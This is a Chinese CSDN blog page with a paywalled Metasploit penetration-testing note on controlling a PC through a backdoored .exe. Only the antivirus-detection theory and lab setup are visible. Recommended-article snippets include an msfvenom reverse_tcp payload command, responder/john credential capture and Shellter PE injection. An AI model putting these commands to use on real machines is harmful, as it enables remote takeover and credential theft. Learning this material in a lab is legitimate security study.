渗透学习笔记1【metasploit通过exe对他人电脑进行操控】

最新推荐文章于 2023-02-06 20:27:44 发布
最新推荐文章于 2023-02-06 20:27:44 发布
阅读量637 收藏 4
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43679507/article/details/86360109
版权
本文介绍了使用Metasploit框架通过exe文件进行渗透测试的步骤,包括木马检测原理、环境准备、内网穿透配置、制作木马后门,并讨论了免杀和隐藏木马的方法。实验过程中,作者发现不同杀毒软件对木马的检测结果不同,强调了安全意识的重要性。
摘要由CSDN通过智能技术生成
                       

注:此内容不得用于违法活动,仅供学习交流使用~

最近在学习metaspolit,参考几个大佬的博客,整理实测了metespolit一次渗透~

0X01、木马检测原理

 

杀毒软件判断病毒木马的方式如下:

   

特征库扫描法:检查文件中是否存在与常见病毒相同的代码。如果匹配,则说明存在病毒。由于该方法较慢,因此现在一般使用通配符扫描法进行代替。

   

云扫描法:将可疑文件上传到云服务器进行检查。需要网络连接。

   

虚拟机脱壳法:使用虚拟机引擎进行文件脱壳(仅支持部分壳类型)。脱壳后的文件将会进一步接受上两种扫描方式的检查。

0X02、环境准备

                 
操作系统 用途 ip地址
win10 被控制的机器
虚拟机kali 攻击机 192.168.214.129

需要使用的软件:

 

注:前两个kali自带,我用的kali版本为17.01版本

最低0.47元/天 解锁文章
还可以啦
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
metasploit渗透第一篇
hyty的博客
11-17 994
版权声明:本文为博主原创文章,转载必须写明出处。
metasploit、msfvenom生成木马入侵电脑及手机
爱我非你莫属的博客
10-08 3112
简介 msfvenom msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件 查看所有–payload的模块 msfvenom -l payloads 文件后缀名-f的格式 msfvenom --help-formats metasploit Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个
反编译简单分析metasploit生成的安卓木马
最新发布
Aiwin的博客
02-06 1324
apk反编译简单分析metasploit的安卓木马
渗透测试指南——工具
热门推荐
weixin_43526443的博客
11-05 6万+
——D&X安全实验室 工欲善其事,必先利其器。回到过去的旧时代,渗透测试是一件非常困难的事,并且需要大量的手动操作。然而如今,渗透测试工具是"安全军火库"中最常使用的装备,一整套的自动化测试工具似乎不仅改造了渗透测试人员,甚至还可以增强计算机的性能,进行比以往更全面的测试。 对渗透测试人员来说不用任何自动化工具对网站或者应用程序进行渗透测试是一件十分困难的事。因此选择一个正确的工具则变得尤为重要,正确的选择甚至占去了渗透测试成功的半壁江山。本篇文章就来和大家介绍一...
linux之shell 输入输出
cuichangzhi5476的博客
01-24 169
如果希望创建一个新文件,并向其中输入一些内容,只需使用cat命令把标准输出重定向到该文件中,这时cat命令的输入是标准输入—键盘,你输入一些文字,输入完毕后按< C T R L - D >结束输入。这真是一个非常简单...
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-web渗透6.pdf 渗透测试-内网客户端渗透9.pdf 渗透测试-内网网络服务端渗透7.pdf 渗透测试-后渗透阶段10.pdf 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8... 渗透测试1.pdf
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
通过阅读《Metasploit渗透测试指南》PDF文件,读者将更深入地了解Metasploit的使用技巧,如何构建和执行渗透测试计划,以及如何利用Metasploit进行有效的安全评估。这份指南不仅适合初学者,也对经验丰富的安全专业...
渗透测试学习笔记资源
08-19
根据提供的文件信息,我们可以深入探讨渗透测试的相关知识点。渗透测试是一种模拟攻击者行为的安全评估方法,旨在识别系统、网络或应用程序中的安全漏洞。通过利用这些漏洞,渗透测试可以帮助组织了解其安全态势,并...
Metasploit渗透测试指南 学习笔记
weixin_56223343的博客
12-04 835
阅读《Metasploit渗透测试指南》读书笔记
Shellter实操——exe文件注入
渗透测试
08-03 1772
Shellter实操 shellter主要功能为入侵PE文件exe),可以将shell代码注入任何32位的本地windows应用程序当中,它允许搭配metasploit框架使用 安装shellter apt-get install shellter 安装完成后,提示符输入shellter打开 成功打开后会出现一个 这里提示可以选择自动(A)手动(M)以及帮助(H),我们选择A 这一步是提供pe目标文件,下面是我自己导入的一个exe文件 大概过个一分钟(或更短)就会提示成功 接下来提示是否选择隐
Kali利用msf渗透Windows电脑(超详细)
RFZ_322的博客
03-09 4万+
Msfvenom命令总结大全1.实时监控屏幕run vnc -i 2.打开摄像头webcam_snap 用kali入侵别人的电脑,手机,安卓,苹果,mac,linxu系统,渗透到对方电脑然后展开进攻
MSF详解及常用命令之利用msf控制目标电脑
世间繁华梦一出
12-21 2583
MSF基本操作详解序言:MSF简介1、模块介绍2、基本命令3、后渗透4、msfvenom生成后门木马 ** 序言:MSF简介 Metasploit简称msf,Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 ** 1、模块介绍 它是一个渗透测试框架(模块介绍) auxi
web调用exe_WEB安全渗透测试基础知识(八)
weixin_39848097的博客
12-12 238
3.5. 命令注入3.5.1. 简介命令注入通常因为指Web应用在服务器上拼接系统命令而造成的漏洞。该类漏洞通常出现在调用外部程序完成一些功能的情景下。比如一些Web管理界面的配置主机名/IP/掩码/网关、查看系统信息以及关闭重启等功能,或者一些站点提供如ping、nslookup、提供发送邮件、转换图片等功能都可能出现该类漏洞。3.5.2. 常见危险函数3.5.2.1. PHPsystemexe...
远程渗透登陆他人电脑
LYKymy的博客
04-17 6793
查看远程电脑IP ipconfig 扫描远程主机开放的端口(查看3389端口是否开放) nmap -Pn *.*.*.*(IP) 执行渗透操作 responder -I eth0 -wv 稍等片刻终端上会显示用户名与密码(hash) 利用john进行密码的破解,进入如下目录进行查看:/usr/share/responer/logs。 john HTTP-*.txt --wordl...
利用kali下的msfvenom入侵电脑
qq_41453632的博客
10-28 3万+
需要的工具:msfvenom . msfconsole (kali里面有) msfvenom  -p  windows/meterpreter/reverse_tcp  LHOST=本地ip  LPORT=本地端口号 –f exe –o 文件名.exe 即生成一个后门文件xss.exe(我这里是将文件名命名为xss的) 然后继续执行命令: msfconsole          (...
MSF --Windows系统后门之exe文件
Kevin's Blog
04-28 1909
文章目录一、环境二、操作2.1 攻击者操作2.2 受害者操作 以下所有的内容仅供网安学习参考,非法攻击他人计算机应后果给予法律制裁!!! 一、环境 Windows 2008 R2(虚拟机,受害者,192.168.7.131) Kali(虚拟机,攻击者,192.168.7.129) 二、操作 2.1 攻击者操作 目的:给windows账户留个后门,这里未提供免杀操作 》》前提MSF能够...
演示使用Metasploit入侵Windows
qq284489030的博客
05-09 2683
我使用KaliLinux的IP地址是192.168.0.112;在同一局域网内有一台运行WindowsXP(192.168.0.108)的测试电脑。   本文演示怎么使用Metasploit入侵windows xp sp3。   启动msfconsole:   # msfconsole   选择一个漏洞:   msf > search platform: windows...
BackTrack渗透测试实战教程:学习笔记Metasploit详解
"BackTrack渗透测试学习笔记是一份由IceSn0w编写的教程,旨在帮助读者深入了解和学习BackTrack在渗透测试中的应用。BackTrack是一款著名的开源网络安全工具集,主要用于进行渗透测试和网络安全评估。该笔记并非专业...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值